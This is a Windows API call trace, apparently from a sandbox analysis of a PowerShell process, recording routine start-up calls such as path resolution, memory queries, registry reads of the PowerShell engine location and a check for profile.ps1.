	[0418.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.746] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0418.751] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.751] CoTaskMemFree (pv=0x1b91c710) 
	[0418.763] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0418.771] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.772] CoTaskMemFree (pv=0x1b91c710) 
	[0418.772] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.772] CoTaskMemFree (pv=0x1b91c710) 
	[0418.772] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.773] CoTaskMemFree (pv=0x1b91c710) 
	[0418.778] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.778] CoTaskMemFree (pv=0x1b91c710) 
	[0418.784] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.784] CoTaskMemFree (pv=0x1b91c710) 
	[0419.319] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0419.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.319] CoTaskMemFree (pv=0x1b91c710) 
	[0419.325] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0419.328] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0420.128] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0420.156] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0420.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.156] CoTaskMemFree (pv=0x1b91c710) 
	[0422.489] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b91c820
	[0422.492] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b91c930
	[0423.662] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.472] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.475] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.475] VirtualQuery (in: lpAddress=0x20a320, lpBuffer=0x20b1e0, dwLength=0x30 | out: lpBuffer=0x20b1e0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.501] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.502] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.503] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.503] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.504] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.505] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.506] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.506] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.507] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.508] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.509] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.509] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.793] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0424.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0424.793] CoTaskMemFree (pv=0x1b91ca40) 
	[0424.797] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0424.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0424.797] CoTaskMemFree (pv=0x1b91ca40) 
	[0424.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0424.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0424.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0424.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.230] VirtualQuery (in: lpAddress=0x20bb80, lpBuffer=0x20ca40, dwLength=0x30 | out: lpBuffer=0x20ca40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.234] VirtualQuery (in: lpAddress=0x20bb80, lpBuffer=0x20ca40, dwLength=0x30 | out: lpBuffer=0x20ca40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.234] VirtualQuery (in: lpAddress=0x20b3d0, lpBuffer=0x20c290, dwLength=0x30 | out: lpBuffer=0x20c290*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.234] VirtualQuery (in: lpAddress=0x20b3d0, lpBuffer=0x20c290, dwLength=0x30 | out: lpBuffer=0x20c290*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.235] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d9d8 | out: phkResult=0x20d9d8*=0x334) returned 0x0
	[0425.235] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d95c, lpData=0x0, lpcbData=0x20d958*=0x0 | out: lpType=0x20d95c*=0x1, lpData=0x0, lpcbData=0x20d958*=0x56) returned 0x0
	[0425.235] CoTaskMemAlloc (cb=0x5a) returned 0x1b93bca0
	[0425.235] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d92c, lpData=0x1b93bca0, lpcbData=0x20d928*=0x56 | out: lpType=0x20d92c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d928*=0x56) returned 0x0
	[0425.236] CoTaskMemFree (pv=0x1b93bca0) 
	[0425.236] RegCloseKey (hKey=0x334) returned 0x0
	[0425.236] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d9d8 | out: phkResult=0x20d9d8*=0x334) returned 0x0
	[0425.236] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d95c, lpData=0x0, lpcbData=0x20d958*=0x0 | out: lpType=0x20d95c*=0x1, lpData=0x0, lpcbData=0x20d958*=0x56) returned 0x0
	[0425.236] CoTaskMemAlloc (cb=0x5a) returned 0x1b93bca0
	[0425.236] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d92c, lpData=0x1b93bca0, lpcbData=0x20d928*=0x56 | out: lpType=0x20d92c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d928*=0x56) returned 0x0
	[0425.236] CoTaskMemFree (pv=0x1b93bca0) 
	[0425.236] RegCloseKey (hKey=0x334) returned 0x0
	[0425.236] CoTaskMemAlloc (cb=0x20c) returned 0x1b904430
	[0425.236] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b904430 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.236] CoTaskMemFree (pv=0x1b904430) 
	[0425.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.237] CoTaskMemAlloc (cb=0x20c) returned 0x1b904430
	[0425.237] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b904430 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.237] CoTaskMemFree (pv=0x1b904430) 
	[0425.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0425.237] SetErrorMode (uMode=0x1) returned 0x1
	[0425.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d940 | out: lpFileInformation=0x20d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
